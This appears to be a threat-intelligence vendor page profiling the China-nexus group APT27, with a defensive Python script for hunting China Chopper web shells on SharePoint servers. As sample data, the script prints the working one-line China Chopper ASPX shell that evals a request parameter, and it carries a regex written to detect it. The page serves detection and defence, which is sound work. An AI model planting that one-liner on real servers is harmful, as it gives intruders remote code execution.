APT27
APT27, also known as Emissary Panda, is a China-nexus advanced persistent threat group assessed to be state-backed and operating in alignment with Chinese strategic interests. Its targeting spans government, academic, utility, heavy industry, manufacturing, and technology organizations, and its operations are consistent with broader Chinese cyber-espionage objectives, including intellectual property theft and surveillance. Other names used for the same activity by different vendors include LuckyMouse and Linen Typhoon.

A representative campaign exploited CVE-2019-0604, a remote code execution vulnerability in Microsoft SharePoint, to gain access to government organizations in the Middle East, then dropped the China Chopper web shell to keep that access. The tradecraft seen across the tracked sources is consistent: exploit an internet-facing application (repeatedly SharePoint), deploy a web shell for persistence, and pivot from there into high-value networks for espionage. The sources tracked here do not support attributing ransomware or other financially motivated attacks to APT27.
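The SharePoint-exploit-then-web-shell pattern above leaves two artifacts a defender can look for: the dropped .aspx file itself and the POST traffic an operator sends to it. The following is an added example written for this page, not code from Mallory or from any vendor; it checks .aspx contents for the one-line China Chopper ASPX payload and scans IIS W3C log lines for POSTs to .aspx files under SharePoint layout paths that arrive with no Referer. The file contents, file paths, and log lines are constructed for the example, and the layout-path list and the two-request threshold are assumptions to tune for your deployment.

```python
"""Hunt for China Chopper-style ASPX web shells on a SharePoint server.

Added example for this page, not vendor or platform code. Two checks:
  1. file contents: the China Chopper ASPX one-liner, which evals a request
     parameter with "unsafe" permissions (the parameter name is the password);
  2. IIS W3C logs: repeated POSTs from one client IP to an .aspx under a
     SharePoint layout directory with no Referer header, the access pattern
     an operator talking to a dropped shell produces.
All sample data below is constructed so the script runs offline.
"""
import re
from collections import Counter

# Matches the China Chopper ASPX payload and captures the password parameter.
CHOPPER_ASPX = re.compile(
    r'<%@\s*Page\s+Language\s*=\s*"Jscript"\s*%>\s*<%\s*eval\s*\('
    r'Request\.Item\["([^"]+)"\]\s*,\s*"unsafe"\s*\)\s*;?\s*%>',
    re.IGNORECASE,
)

# Assumption: layout virtual paths for SharePoint 2013/2010 (widen as needed).
LAYOUT_PATHS = ("/_layouts/15/", "/_layouts/14/")


def find_chopper_shells(files):
    """files: {path: content}. Returns [(path, password_param)] for each hit."""
    hits = []
    for path, content in files.items():
        m = CHOPPER_ASPX.search(content)
        if m:
            hits.append((path, m.group(1)))
    return hits


# Default W3C field order used when a log chunk has no #Fields header.
IIS_FIELDS = ("date", "time", "s-ip", "cs-method", "cs-uri-stem", "cs-uri-query",
              "s-port", "cs-username", "c-ip", "cs(User-Agent)", "cs(Referer)",
              "sc-status", "sc-substatus", "sc-win32-status", "time-taken")


def parse_iis(lines):
    """Parse W3C extended log lines into dicts, honoring #Fields headers."""
    fields = list(IIS_FIELDS)
    rows = []
    for line in lines:
        line = line.strip()
        if not line:
            continue
        if line.startswith("#Fields:"):
            fields = line.split(":", 1)[1].split()
            continue
        if line.startswith("#"):
            continue
        parts = line.split()
        if len(parts) != len(fields):
            continue  # malformed line; skip rather than misalign columns
        rows.append(dict(zip(fields, parts)))
    return rows


def suspicious_posts(rows, min_count=2):
    """Return {(client_ip, uri): count} for referer-less 200 POSTs to layout .aspx."""
    counts = Counter()
    for r in rows:
        uri = r.get("cs-uri-stem", "").lower()
        if (r.get("cs-method") == "POST"
                and uri.endswith(".aspx")
                and uri.startswith(LAYOUT_PATHS)
                and r.get("cs(Referer)", "-") == "-"
                and r.get("sc-status") == "200"):
            counts[(r["c-ip"], uri)] += 1
    return {k: v for k, v in counts.items() if v >= min_count}


# Constructed sample data: one planted shell beside a benign page.
SAMPLE_FILES = {
    r"C:\Program Files\Common Files\microsoft shared\Web Server Extensions\15\TEMPLATE\LAYOUTS\help.aspx":
        '<%@ Page Language="Jscript"%><%eval(Request.Item["pass"],"unsafe");%>',
    r"C:\Program Files\Common Files\microsoft shared\Web Server Extensions\15\TEMPLATE\LAYOUTS\start.aspx":
        '<%@ Page Language="C#" MasterPageFile="~masterurl/default.master" %>',
}

# Constructed IIS log: two operator POSTs to the shell from 203.0.113.7 and
# two legitimate requests from an authenticated user with a Referer.
SAMPLE_LOG = """#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken
2019-03-10 02:11:04 10.0.0.5 POST /_layouts/15/help.aspx - 443 - 203.0.113.7 Mozilla/4.0 - 200 0 0 120
2019-03-10 02:11:09 10.0.0.5 POST /_layouts/15/help.aspx - 443 - 203.0.113.7 Mozilla/4.0 - 200 0 0 98
2019-03-10 02:12:00 10.0.0.5 GET /sites/hr/default.aspx - 443 CORP\\alice 10.0.0.23 Mozilla/5.0 https://sp.corp/ 200 0 0 15
2019-03-10 02:12:30 10.0.0.5 POST /_layouts/15/start.aspx - 443 CORP\\alice 10.0.0.23 Mozilla/5.0 https://sp.corp/sites/hr 200 0 0 40
"""


def run_hunt(files=SAMPLE_FILES, log_text=SAMPLE_LOG):
    """Run both checks and return (shell_hits, suspicious_post_counts)."""
    shells = find_chopper_shells(files)
    posts = suspicious_posts(parse_iis(log_text.splitlines()))
    return shells, posts


if __name__ == "__main__":
    shells, posts = run_hunt()
    for path, pw in shells:
        print(f"web shell: {path} (password param: {pw})")
    for (ip, uri), n in posts.items():
        print(f"suspicious: {n} referer-less POSTs from {ip} to {uri}")
```

Feed `find_chopper_shells` the contents of every .aspx under the SharePoint layout and web application directories, and `parse_iis` the W3C logs from `inetpub\logs\LogFiles`. The file check only catches the unobfuscated Jscript one-liner; China Chopper also has PHP and JSP variants, and operators rewrite the ASPX form, so treat the log heuristic (short bursts of referer-less POSTs to a layout page that normally never receives POSTs, especially from an address outside your ranges) as the more durable signal and pivot from it to file creation times and the w3wp.exe child processes a shell spawns.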
Know when an actor pivots toward your sector
Mallory correlates actor tradecraft and target patterns against your stack, your sector, and your geography. See overlap before they land.
Recent activity
5 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.
Linen Typhoon is a Chinese state-backed threat actor known for conducting espionage attacks and intellectual property theft, recently observed exploiting the ToolShell (CVE-2025-53770) vulnerability in Microsoft SharePoint to compromise government, telecom, and academic organizations worldwide.
APT27 is a Chinese cyber-espionage group known for targeting organizations for intelligence gathering.
Lucky Mouse is a China-nexus threat actor known for targeting government and technology sectors, developing cross-platform malware, and leveraging spearphishing and supply chain attacks.
LuckyMouse is a Chinese-speaking APT group targeting government organizations in the Middle East, exploiting SharePoint vulnerabilities and using web shells for further compromise.
The version that knows your environment.
Match sector + geo + tech-stack targeting against your real footprint.
Every observed MITRE ATT&CK technique, grouped by tactic.
Families this actor is known to deploy, with IOCs and behavior.
CVEs this actor has used in known campaigns.
YARA, Sigma, Snort, and vendor rules, auto-deployed to your SIEM.
Domains, IPs, and hashes tied to this actor, refreshed continuously.